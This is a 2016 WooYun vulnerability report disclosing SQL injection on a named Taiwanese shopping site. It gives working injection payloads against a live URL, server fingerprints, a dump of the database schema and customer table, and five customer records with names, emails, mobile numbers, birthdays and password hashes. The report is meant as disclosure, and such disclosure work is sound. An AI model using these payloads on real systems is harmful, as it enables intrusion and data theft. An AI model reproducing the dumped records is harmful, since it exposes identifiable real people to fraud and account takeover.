当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0177702

漏洞标题:ONCEOK主站SQL注入(大量用户信息泄露)(臺灣地區)

相关厂商:ONCEOK

漏洞作者: 路人甲

提交时间:2016-02-22 16:34

修复时间:2016-02-27 16:40

公开时间:2016-02-27 16:40

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2016-02-22: 细节已通知厂商并且等待厂商处理中
2016-02-27: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

详细说明:

http://www.onceok.com.tw/scenic.php?id=1

Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1' AND 7688=7688 AND 'yyIF'='yyIF
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=1' AND (SELECT 9007 FROM(SELECT COUNT(*),CONCAT(0x3a736f713a,(SELECT (CASE WHEN (9007=9007) THEN 1 ELSE 0 END)),0x3a72666e3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'BOaF'='BOaF
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 OR time-based blind
    Payload: id=-2910' OR 4578=SLEEP(5) AND 'TbOI'='TbOI
---
web server operating system: Linux CentOS 4.9
web application technology: Apache 2.0.52, PHP 5.1.6
back-end DBMS: MySQL 5.0
available databases [2]:
[*] information_schema
[*] onceok

漏洞证明:

Database: onceok
[148 tables]
+----------------------------------------+
| blog_type                              |
| check_log                              |
| city                                   |
| company_contacts                       |
| config                                 |
| customer_address                       |
| customer_facebook                      |
| customer_friends                       |
| customer_outsource                     |
| customer_wishlist                      |
| customers                              |
| customers_epaper                       |
| customers_fix                          |
| depts_info                             |
| email_content                          |
| epaper                                 |
| footprints                             |
| forums_detail                          |
| forums_info                            |
| forums_topic                           |
| forums_topic_reply                     |
| forums_topic_status                    |
| forums_topic_type                      |
| forums_user                            |
| goods_detail                           |
| goods_group                            |
| goods_group_accumulate                 |
| goods_group_accumulate_log             |
| goods_info                             |
| goods_inventory                        |
| goods_inventory_log                    |
| goods_limited                          |
| goods_limited_accumulate               |
| goods_limited_accumulate_log           |
| goods_special                          |
| goods_subtype                          |
| goods_type                             |
| hot_news                               |
| idx_ad                                 |
| idx_choice                             |
| idx_pic_config                         |
| idx_search                             |
| idx_special                            |
| idx_store                              |
| inquiry_info                           |
| inquiry_items                          |
| invo_lotto                             |
| invo_prt                               |
| invo_range                             |
| invo_reprt                             |
| ip_view_pool                           |
| onceok_blog                            |
| orders_full_amount                     |
| orders_info                            |
| orders_infobak                         |
| orders_items                           |
| orders_status                          |
| page_content                           |
| page_template                          |
| pagetrack                              |
| pagetrack_transation                   |
| sendmail_h                             |
| sendmail_m                             |
| shopping_cart                          |
| stores_area                            |
| stores_detail                          |
| stores_info                            |
| stores_special                         |
| tb_ok_also_purchased_match             |
| tb_ok_also_purchased_order             |
| tb_ok_also_purchased_temp_items        |
| tb_ok_also_purchased_temp_match        |
| tb_ok_ap                               |
| tb_ok_atm_file                         |
| tb_ok_atm_file_contain                 |
| tb_ok_banner                           |
| tb_ok_cat_temp                         |
| tb_ok_credit_debug_log                 |
| tb_ok_customer_login_log               |
| tb_ok_customer_order                   |
| tb_ok_debug_logs                       |
| tb_ok_freight                          |
| tb_ok_goods_log                        |
| tb_ok_goods_monthly_sales_list         |
| tb_ok_goods_qa                         |
| tb_ok_goods_sales_all                  |
| tb_ok_goods_sales_day                  |
| tb_ok_goods_sales_month                |
| tb_ok_goods_sales_status               |
| tb_ok_goods_sales_week                 |
| tb_ok_goods_sales_year                 |
| tb_ok_goods_weekly_sales_list          |
| tb_ok_http_referer                     |
| tb_ok_http_referer_order               |
| tb_ok_http_referer_setup               |
| tb_ok_idx_temp                         |
| tb_ok_keyword                          |
| tb_ok_money_log                        |
| tb_ok_money_type                       |
| tb_ok_order_qa                         |
| tb_ok_order_rec                        |
| tb_ok_order_status_log                 |
| tb_ok_return_d                         |
| tb_ok_return_m                         |
| tb_ok_return_status                    |
| tb_ok_role                             |
| tb_ok_role_ap                          |
| tb_ok_scenic                           |
| tb_ok_scenic_content                   |
| tb_ok_search                           |
| tb_ok_serial                           |
| tb_ok_serial_test                      |
| tb_ok_ship_seq                         |
| tb_ok_shipment_d                       |
| tb_ok_shipment_m                       |
| tb_ok_shipment_status                  |
| tb_ok_stock                            |
| tb_ok_store_log                        |
| tb_ok_stores_sales_month               |
| tb_ok_survey                           |
| tb_ok_survey_item                      |
| tb_ok_user_role                        |
| tb_ok_users                            |
| tb_ok_users_log                        |
| view_ok_also_purchased_order_yday      |
| view_ok_also_purchased_temp_items_yday |
| view_ok_also_purchased_temp_match_yday |
| view_ok_customer_order                 |
| view_ok_goods_full_amount              |
| view_ok_goods_monthly_sales_list       |
| view_ok_goods_sales_all                |
| view_ok_goods_sales_all_info           |
| view_ok_goods_sales_day                |
| view_ok_goods_sales_month              |
| view_ok_goods_sales_status             |
| view_ok_goods_sales_week               |
| view_ok_goods_sales_year               |
| view_ok_goods_store_info               |
| view_ok_goods_type                     |
| view_ok_goods_weekly_sales_list        |
| view_ok_http_referer_order             |
| view_ok_money                          |
| view_ok_order_item_check               |
| view_ok_ship_item_check                |
| view_ok_ship_return                    |
| view_ok_store_sales_info               |
| view_ok_stores_type                    |
| view_search_keywords_yahoo             |
+----------------------------------------+
Database: onceok
+----------------------------------+---------+
| Table                            | Entries |
+----------------------------------+---------+
| customers                        | 41591   |
Table: customers
[46 columns]
+----------------+---------------------+
| Column         | Type                |
+----------------+---------------------+
| position       | varchar(10)         |
| address        | varchar(150)        |
| auth           | varchar(32)         |
| bday           | tinyint(3) unsigned |
| birthday       | varchar(10)         |
| blog           | varchar(200)        |
| bmonth         | tinyint(3) unsigned |
| byear          | int(10) unsigned    |
| career         | varchar(5)          |
| cdate          | datetime            |
| city           | varchar(10)         |
| CREATE_DATE    | datetime            |
| CREATE_USER    | varchar(100)        |
| credit_card    | varchar(1)          |
| DATESTAMP      | datetime            |
| description    | varchar(100)        |
| district       | varchar(10)         |
| education      | varchar(1)          |
| email          | varchar(100)        |
| email_epaper   | varchar(1)          |
| email_premium  | varchar(1)          |
| facebook       | varchar(50)         |
| fax_01         | varchar(16)         |
| fax_02         | varchar(16)         |
| fburl          | varchar(200)        |
| free_sepecial  | tinyint(4)          |
| gender         | varchar(1)          |
| google         | varchar(100)        |
| id             | varchar(100)        |
| identification | varchar(10)         |
| income         | varchar(10)         |
| info           | varchar(50)         |
| ldate          | datetime            |
| mobile         | varchar(10)         |
| name           | varchar(20)         |
| ok_money_total | int(11)             |
| ok_ranking     | int(11)             |
| password       | varchar(60)         |
| status         | varchar(1)          |
| tel_day        | varchar(30)         |
| tel_night      | varchar(16)         |
| uid            | int(11) unsigned    |
| user_id        | varchar(100)        |
| USERSTAMP      | varchar(100)        |
| yahoo          | varchar(100)        |
| zip            | varchar(5)          |
+----------------+---------------------+
选取部分字段证明
Table: customers
[10 entries]
+------+------------------+-------+-------------------------+--------+------------+-------------+------------+----------+-------------------------------------+
| city | name             | yahoo | email                   | google | mobile     | address     | birthday   | facebook | password                            |
+------+------------------+-------+-------------------------+--------+------------+-------------+------------+----------+-------------------------------------+
| ???  | chuang, hung pin | NULL  | <blank>                 | NULL   | 0935223535 | ???36?      | 1970-12-28 | NULL     | d9618da8da4fb1d80daf02797b4d4340:c4 |
| ???  | ???              | NULL  | joanna1501@yahoo.com.tw | NULL   | 0972276630 | ????26?     | 1974-12-12 | NULL     | 6409432bdc4af080ed845b93fca62617:c3 |
| ???  | ???              | NULL  | dw6015@yahoo.com.hk     | NULL   | 0912539196 | ????3?766?  | 1975-12-19 | NULL     | c2a8a393bb8941f8b4463f30646c891f:64 |
| ???  | ???              | NULL  | yentinglee@hotmail.com  | NULL   | 0928979708 | ????27?103? | 1976-12-19 | NULL     | f670d02dd1aee9059d84800f545a4cea:5c |
| ???  | ???              | NULL  | huchuway@yahoo.com.tw   | NULL   | 0918166698 | ????77?7??3 | 1982-12-19 | NULL     | 66136131b80e871fe8e5617158e8a4c9:d5 |
+------+------------------+-------+-------------------------+--------+------------+-------------+------------+----------+-------------------------------------+

修复方案:

SQL参数化+预编译

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2016-02-27 16:40

厂商回复:

漏洞Rank:4 (WooYun评价)

最新状态:

暂无

漏洞评价:

评价

  1. 2016-02-29 09:06 | 暴走 ( 普通白帽子 | Rank:518 漏洞数:95 | Wooyun的Rank获取如同Dota冲天梯有过之而无...)

    洞主,应该和 WooYun: 萬事OK在线商城sql注射 重复了吧